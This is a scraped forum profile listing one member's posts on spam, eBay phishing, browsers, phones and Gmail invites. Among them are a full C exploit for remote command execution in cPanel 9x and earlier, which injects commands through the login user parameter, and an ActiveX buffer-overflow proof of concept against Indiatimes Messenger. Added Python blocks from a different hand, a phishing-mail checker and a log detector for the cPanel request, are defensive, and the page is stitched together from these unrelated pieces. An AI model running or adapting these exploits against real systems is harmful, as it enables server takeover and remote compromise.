xisto Community

sunny
Members, Content Count: 94
Everything posted by sunny

  1. Yes, it is true. Google also has an interface dedicated to those H4x0r people. Visit it at https://www.google.com/?hl=xx-hacker&gws_rd=ssl and see for yourself. Thumbshot of the site:
  2. Another vulnerability in phpBB based forums that can be used to easily gain access to the forum at any user level. Even the admin account is not secure with the default setup. Click here for more details about "How to be Admin on phpBB in Simple steps!" And here is the homepage of phpBB; click here to download the latest version.
  3. As with all other software and scripts, phpBB also has a long history of vulnerabilities. But it is better than others because of the developer community's quick response to newly found security loopholes. phpBB issues are generally fixed in much less time than in other systems, and that is why I like phpBB. For the user, it is always a good practice to bookmark the phpBB homepage to get the update news in time.
  4. I found it on some security portal. It is interesting to know that our faithful cPanel has some vulnerabilities. One more thing: while I was experimenting with the code, I found out that the server is secure if it is using an updated version of cPanel. And in Xisto's case I am sure that we are secure :-)
  5. Some facts about spamming:
     • AT&T WorldNet says it rejects 10 million to 12 million e-mails a day because the addresses don't match real users'--a sure sign that spammers are at work. (Newsweek - Crammed with Spam)
     • 1/2 to 3/4 of all spam email has forged reply addresses, estimating that the spam volume is now up to 1 billion messages a year. (Jeff Lawhorn, Software Design Associates)
     • Most ISPs estimate the extra cost due to spam as $2 to $3 per month per user, and longer connection times, which can be costly for rural users who have to dial long distance to connect to the Internet. (IDG)
     • A recent survey found that ISPs spend millions of dollars to stop spammers, with about $2 of each subscriber's bill going toward spam prevention. (CNN)
     • Approximately 10% of ISP overhead deals with spam (churn rate; lost revenue due to defection; new customer acquisition; infrastructure; personnel). (Gartner Group)
     • The Federal Trade Commission reports that when it went after spammers earlier this year, it received 500 unsolicited e-mails in a single mailbox every day - and the commission probably didn't receive it all. (CNN)
     • The increases in marketing messages are outpacing the growth in personal e-mail. By 2005, expect to get about one marketing e-mail for every two or three personal messages. (Industry Standard)
     • Spending on commercial e-mail will balloon to $7.3 billion in 2005 from $164 million in 1999. In 1999, the average consumer received 40 pieces of spam. By 2005, the total is likely to soar to 1,600. (Jupiter Communications)
     • FTC gets 4,500 spam complaints per day.
     • The average business e-mail user receives three spam messages a day, and in three years that number will swell to 40. In 2003 we'll waste 15 hours deleting e-mail, compared to 2.2 hours in the year 2000. That will cost the average business in the future $400 per in-box, compared to $55 today. (Ferris Research)
     • The average U.S. consumer will receive 1,600 commercial email messages in 2005, up from 40 in 1999, while non-marketing and personal correspondence will more than double from approximately 1,750 emails per year in 1999 to almost 4,000 in 2005. (Jupiter Communications, May 2000)
     • By 2002, e-mail will grow from 9.8% to 17.3% of a company's total number of contacts with a customer. (Forrester Research)
     One more thing: if you got an email from eBay and you suspect that it is not from the actual eBay.com, then you can report this to eBay by forwarding that mail in its original form to spoof@ebay.com. Your complaint will be registered and the people sending those emails will be executed (hopefully). Anyway, by doing so you can help eBay to find out more about those cheaters.
  6. Foxy is NOT Firefox. Not even near Firefox. It is just an interface to IE. I found Maxthon much better than other IE-based browsers. URL: http://www.maxthon.com/ Notice from wassie: Please quote everything you copy and paste from another website!
  7. Well, even if it is not in English, I can tell for sure that it is a cute news site :-) You are using a content management system (CMS). So what do you want us to comment on: the CuteNews [ http://cutephp.com/ ] or the content you have posted on the site? If your answer is the 'content' then sorry my friend, I can't understand the content language. One more thing, the site is still under construction. So, please complete it before sending it in for a review. Anyway, nice attempt.
  8. Currently there are several jokers out there who try to send fake emails pretending to be from eBay itself. Such emails may be used to steal personal as well as financial data if the user receiving the mail clicks on the links. After contacting eBay Support via email I got the following tips. I am posting the mail I got from eBay as it is, so that the users of Xisto can also detect a fake email and maintain their privacy.

From: eBay Customer Support <spoof@ebay.com>
To: Cyber Mitra < cyber . mitra @gmail.com>

Hello,

Thank you for writing to eBay regarding the email you received.

Emails such as this, commonly referred to as "spoof" or "phished" messages, are sent in an attempt to collect sensitive personal or financial information from the recipients.

The email you reported was not sent by eBay. We have reported this email to the appropriate authorities.

In the future, be very cautious of any email that asks you to submit information such as your credit card numbers or passwords. If you are ever concerned about an email you receive from eBay, simply follow these steps:

1. Open a new Web browser and type http://www.ebay.com/ into your browser address field to go directly to the eBay site.
2. On eBay, click on the "My eBay" link at the top of the page and sign into your account.
3. Check the "My Messages" link located on the left side of the My eBay page. If an email affects your eBay account, it's now in "My Messages." Any email sent to your registered eBay email address from eBay or from another eBay member via eBay's member-to-member communication system will also appear in "My Messages."

Just remember, if you get an email regarding a problem with your account or that is requesting personal information, and the email looks like it is from eBay, please check My Messages first. If it's not there, it's a fake email.

If you still have any doubt about whether an email message is from eBay, please forward it to spoof@ebay.com immediately. Do not respond to it or click any of the links. Do not remove the original subject line or change the email in any way when you forward it to eBay.

If you have already entered sensitive personal information, financial information, or your password into a Web site based on a request from a spoofed email, you should take immediate action to protect your identity and all of your online accounts. We have developed an eBay Help page with valuable information regarding the steps you should take to protect yourself. [link no longer exists: http://forums.xisto.com/no_longer_exists/]

To review eBay's new tutorial about Spoof Emails, please see the following Web page: [link no longer exists: http://forums.xisto.com/no_longer_exists/]

To help you better protect yourself from fake eBay and PayPal Web sites, we have developed a feature for the eBay Toolbar called "Account Guard." Account Guard includes an indicator of when you are on an eBay or PayPal Web site or a known spoof (or "phishing") site, buttons to report fake eBay Web sites, and a password notification feature that warns you when you may be entering your eBay password on an unverified site.

To learn more about the eBay Toolbar with Account Guard, please go to http://www.ebay.com/, click on "Downloads" at the bottom of the page, and then click on the "eBay Toolbar" link.

We also recommend that you keep your browser, operating system, and virus protection software up to date. Check for updates at the "Windows Update" link on http://www.microsoft.com/de-de and scan your computer for viruses often.

Once again, thank you for alerting us to the spoof email you received. Your efforts help keep eBay a safe and fair place to trade.

Regards,
Ande
eBay SafeHarbor Investigations Team
______________________________
eBay
The World's Online Marketplace!

*******************************************
Important: eBay will not ask you for sensitive personal information (such as your password, credit card and bank account numbers, Social Security numbers, etc.) in an email. Learn more account protection tips at: [link no longer exists: http://forums.xisto.com/no_longer_exists/]

For our latest announcements, please check: [link no longer exists: http://forums.xisto.com/no_longer_exists/]

In order to better serve you, we'd like to occasionally request feedback on our service. If you would rather not participate, please click on the link below and send us an email with the word "REMOVE" in the subject line. If that does not work, please send an email to the email address below. Your request will be processed within 5 days.
mailto:cssremove@ebay.com
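Added example, not part of sunny's post or of eBay's reply: a small Python check that applies the indicators the eBay mail describes (links that do not land on an eBay/PayPal host, link text that claims one host while the href goes to another, and a body that asks for passwords or card numbers) to a raw message. Both sample mails, their hostnames and the 203.0.113.5 address are constructed for this example; the sender check is included only as a weak signal, since a From header is trivially forged.

```python
"""Flag the spoof indicators from the eBay advice in a raw e-mail message."""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_DOMAINS = ("ebay.com", "paypal.com")  # the brands the eBay mail talks about

# Constructed sample messages (not real mails; hosts are made up for the example).
SPOOF_MAIL = b"""From: "eBay Customer Support" <support@ebay.com>
To: member@example.net
Subject: Your eBay account has been suspended
Content-Type: text/html; charset=us-ascii

<html><body>
<p>We need you to confirm your password and credit card number.
Please <a href="http://ebay.com.account-verify.example/login">click here</a>
or go to <a href="http://203.0.113.5/ebay/">http://www.ebay.com/</a>.</p>
</body></html>
"""

GENUINE_MAIL = b"""From: "eBay" <news@ebay.com>
To: member@example.net
Subject: New items in your saved searches
Content-Type: text/html; charset=us-ascii

<html><body><p>See them in <a href="http://www.ebay.com/">My eBay</a>.</p></body></html>
"""

CREDENTIAL_WORDS = re.compile(r"\b(password|credit card|bank account|social security)\b", re.I)


def is_trusted(host):
    """True if host is one of TRUSTED_DOMAINS or a subdomain of one.
    The match is anchored at the right end, so 'ebay.com.evil.example' is rejected."""
    if not host:
        return False
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> tags in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def spoof_indicators(raw):
    """Return a list of human-readable reasons why `raw` (bytes) looks like a spoof."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []

    # 1. Sender domain: cheap, easily forged, so only one signal among several.
    addresses = msg["From"].addresses if msg["From"] else ()
    sender_domain = addresses[0].domain if addresses else ""
    if not is_trusted(sender_domain):
        findings.append(f"From address domain is not eBay/PayPal: {sender_domain!r}")

    body = msg.get_body(preferencelist=("html", "plain"))
    text = body.get_content() if body else ""

    # 2. eBay's own rule: it never asks for passwords or card numbers by mail.
    if CREDENTIAL_WORDS.search(text):
        findings.append("body asks for sensitive data (password/card/bank/SSN)")

    # 3. Every link must land on a trusted host, and visible link text that looks
    #    like a URL must name the same host the href really points to.
    collector = LinkCollector()
    collector.feed(text)
    for href, label in collector.links:
        host = urlparse(href).hostname
        if not is_trusted(host):
            findings.append(f"link points to untrusted host {host!r}")
        label_host = urlparse(label).hostname if "://" in label else None
        if label_host and label_host.lower() != (host or "").lower():
            findings.append(f"link text shows {label_host!r} but goes to {host!r}")
    return findings


if __name__ == "__main__":
    for name, mail in (("spoof", SPOOF_MAIL), ("genuine", GENUINE_MAIL)):
        print(name, spoof_indicators(mail))
```

The spoof sample trips three of the four checks (credential request, two untrusted link hosts, and a link whose text shows www.ebay.com but whose href goes to an IP address); the genuine sample trips none. Forwarding a suspect mail to spoof@ebay.com unchanged, as the reply asks, is still the right action; this script only helps decide which mails to forward.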
  9. Explanation: Indiatimes Messenger is a communication client application just like Yahoo! Messenger. The Indiatimes Messenger is used by the site http://www.indiatimes.com/ as usual. Indiatimes.com also has some issues with their web site, like in the registration process, but that is a different story. Anyway, Indiatimes Messenger shows some problematic behaviour under certain conditions, which may lead to a buffer overflow and thus also result in remote compromise.
  10. Exploit for cPanel versions 9x and below that takes advantage of a remote command execution vulnerability.
[CODE]
/* cPanel <= 9x Remote Command Execution */

/* headers */
#include <stdio.h>     /* In/Out */
#include <winsock2.h>  /* sockets functions */
#include <stdlib.h>    /* memory functions */
#include <string.h>    /* strlen, strcat, strcpy */

#pragma comment(lib, "ws2_32.lib") /* for compile with dev-c++ link to "libws2_32.lib" */

#define Port 2082 /* port for connect to cPanel */
#define SIZE 1024 /* buffer size to receive the data */

/* connect host:port */
SOCKET Conecta(char *Host, short puerto)
{
    /* struct for make the socket */
    WSADATA wsaData;
    SOCKET Winsock; /* listener socket */
    /* two structures for connect */
    struct sockaddr_in Winsock_In;
    struct hostent *Ip;

    /* start the socket */
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    /* make */
    Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    /* check socket status */
    if (Winsock == INVALID_SOCKET) {
        /* exit */
        WSACleanup();
        return INVALID_SOCKET;
    }
    /* complete the struct */
    Ip = gethostbyname(Host);
    if (Ip == NULL) { /* name resolution failed */
        closesocket(Winsock);
        WSACleanup();
        return INVALID_SOCKET;
    }
    Winsock_In.sin_port = htons(puerto);
    Winsock_In.sin_family = AF_INET;
    Winsock_In.sin_addr.s_addr = inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
    /* connect */
    if (WSAConnect(Winsock, (SOCKADDR *)&Winsock_In, sizeof(Winsock_In), NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        /* end */
        closesocket(Winsock);
        WSACleanup();
        return INVALID_SOCKET;
    }
    return Winsock;
}

/* MASTER FUNCTION */
int main(int argc, char *argv[])
{
    /* the socket */
    SOCKET sock;
    /* make the evil buffer to send the request: the command is placed between
       back-ticks inside the user parameter (%22 = '"', %60 = '`') */
    char evil_request[] = "GET /login/?user=|%22%60";
    char evil_request2[] = "%60%22\r";
    char *evil;
    /* to receive the data */
    char buf[SIZE];
    int n;

    printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex");
    printf("\n");
    printf("\n-----------------------------------------------------\n");
    if (argc != 3) { /* cPanel_9x_rce.exe <host> <command> */
        printf("\n[+] Usage: %s <host> <command>\n", argv[0]);
        return 0;
    }
    printf("\n[+] Connecting %s:%d...", argv[1], Port);
    /* start the exploit */
    sock = Conecta(argv[1], Port); /* connect */
    if (sock == INVALID_SOCKET) {
        printf("Error\n");
        return 1;
    }
    printf("OK");
    /* make the EVIL request: prefix + command + suffix + "\n\n" + NUL */
    evil = (char *)malloc(strlen(evil_request) + strlen(argv[2]) + strlen(evil_request2) + 3);
    strcpy(evil, evil_request);
    strcat(evil, argv[2]);
    strcat(evil, evil_request2);
    strcat(evil, "\n\n");
    /* sends it */
    send(sock, evil, (int)strlen(evil), 0);
    n = recv(sock, buf, SIZE - 1, 0);
    if (n < 0) /* recv() returns -1 on error; never index buf with it */
        n = 0;
    buf[n] = '\0';
    /* show the data */
    printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n", buf);
    closesocket(sock);
    WSACleanup();
    free(evil); /* buf lives on the stack and needs no free */
    return 0;
}
[/CODE]
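Added example, written for this page and not taken from sunny's post or from the exploit's author: a Python detector that scans web-server access logs for the request shape the exploit above sends, a GET to /login/ whose user parameter carries shell metacharacters (the exploit uses | and back-ticks) once percent-decoded. The combined-format log lines and the addresses in them are constructed for the example, and it is an assumption that the cPanel service on port 2082 logs requests in a similar format.

```python
"""Find cPanel /login/?user=... requests that carry shell metacharacters."""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample log lines in Apache combined format (not from a real host).
# Lines 1 and 3 mirror the exploit's request; line 3 is additionally double-encoded.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Jun/2005:13:02:11 +0000] "GET /login/?user=|%22%60id%60%22 HTTP/1.0" 200 512 "-" "-"
198.51.100.4 - - [10/Jun/2005:13:02:15 +0000] "GET /login/?user=alice HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jun/2005:13:03:40 +0000] "GET /login/?user=%257C%2522%2560cat%2520/etc/passwd%2560%2522 HTTP/1.0" 200 4096 "-" "-"
198.51.100.7 - - [10/Jun/2005:13:04:02 +0000] "POST /login/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>\S+))?" (?P<status>\d{3})'
)

# Characters that end one shell command and start another or substitute output.
SHELL_META = re.compile(r"[|`;&$]")


def decode_param(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_text):
    """Return one dict per log line whose /login/ user parameter contains shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m["target"])
        if url.path.rstrip("/") != "/login":
            continue
        # parse_qs already decodes one layer; decode_param handles the rest.
        for value in parse_qs(url.query, keep_blank_values=True).get("user", []):
            decoded = decode_param(value)
            if SHELL_META.search(decoded):
                hits.append({"ip": m["ip"], "time": m["ts"], "user_param": decoded})
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} user={hit['user_param']!r}")
```

The check is deliberately narrow (path plus one parameter plus a short metacharacter class) so that it fires on the exploit's request and on trivial re-encodings of it, without flagging ordinary logins; a legitimate username never needs a pipe or a back-tick.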
  11. [CODE]
Indiatimes Messenger 6.0 Buffer Overflow (Remote)

Vulnerable Program : Indiatimes Messenger v6.0 (Latest)
Vendor URL : http://messenger.indiatimes.com/
Exploit Type : Remote DoS (Remote Compromise may also be possible)

Proof Of Concept:
[script]
var obj1 = new ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";
for (var i = 0; i < 1000; i++) {
    buf += "A";
}
while (obj1.GetServerStatus() != "Logged In"); // wait till login
obj1.RenameGroup("Friends", buf, 5);
[/script]

The program (MMClient.exe) crashes @ 004B681B  8979 04  mov dword ptr ds:[ecx+4],edi
with registers ecx and edi = 0x41414141 [controllable]
So, remote compromise may be possible (not confirmed).
[/CODE]
  12. Crazy Frog just drives people crazy. The video is good and the music is O.K. I can't understand why it is getting so popular. For those who don't know what the 'Crazy Frog' thing is, visit https://en.wikipedia.org/wiki/Crazy_Frog. Yes, Wikipedia has a topic dedicated to Crazy Frog.
  13. Good stuff! Saint_Michael, where did you get all those? What about 30 credits per download?
  14. Buy some more cool stuff for my computer - ($2000)
      Invest some money in fast cash schemes (casino) - ($2500)
      Donate to the needy - ($2000)
      Thanks gift to the person giving me the money - ($500)
      A party with friends - ($2000)
      Give each one of you a $50 bill for being my friend.
  15. I have a Samsung RD220. It's a nice phone with basic features. I am planning to buy a new one with some cool features like a >1 megapixel camera.
  16. Here are a few Gmail invitations ready to use :-) Use them as soon as possible:
      https://accounts.google.com/SignUp?service=mail&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fe-11-1c6e77fafa4f79e7de5106bad5f41d-63a59b66398ac4a50c3472afec4fa38cc0b6057b
      https://accounts.google.com/SignUp?service=mail&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fe-11-19f60869f27ae8d4e21a87833e0a04-5788d58ad0442fcb6266831eb54dbb9755814f82
      https://accounts.google.com/SignUp?service=mail&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fe-11-217935baadbb68c9cd72b020eca648-e6d71121bd7fe013634ca038cd68dc5f1430683e
      https://accounts.google.com/SignUp?service=mail&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fe-11-12b1ad28eb9a26ebc444962b51913d-4e86ee8955475df688eae406f98c3c84c85b84aa
      Please let everybody know when you use any one of the invitations posted here.
      Thanks, Sunny
      http://forums.xisto.com/no_longer_exists/
      https://cybermitra.com/
  17. Well, all of you have had your invitations sent. :-) Anyone else need an invitation?
  18. If you haven't already heard about Gmail, it's a new search-based webmail service that offers:
      - 1,000 megabytes (one gigabyte) of free storage
      - Built-in Google search that instantly finds any message you want
      - Automatic arrangement of messages and related replies into "conversations"
      - Text ads and related pages that are relevant to the content of your messages
      _____________________________________________
      Now just request and I'll send you one Gmail invitation. Here is one for the early bird:
      https://accounts.google.com/SignUp?service=mail&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fe-11-1d6ef094e53ccbda0df0d3edf4e6e2-5586271fdbe6d6c92cc4a67419817815307af525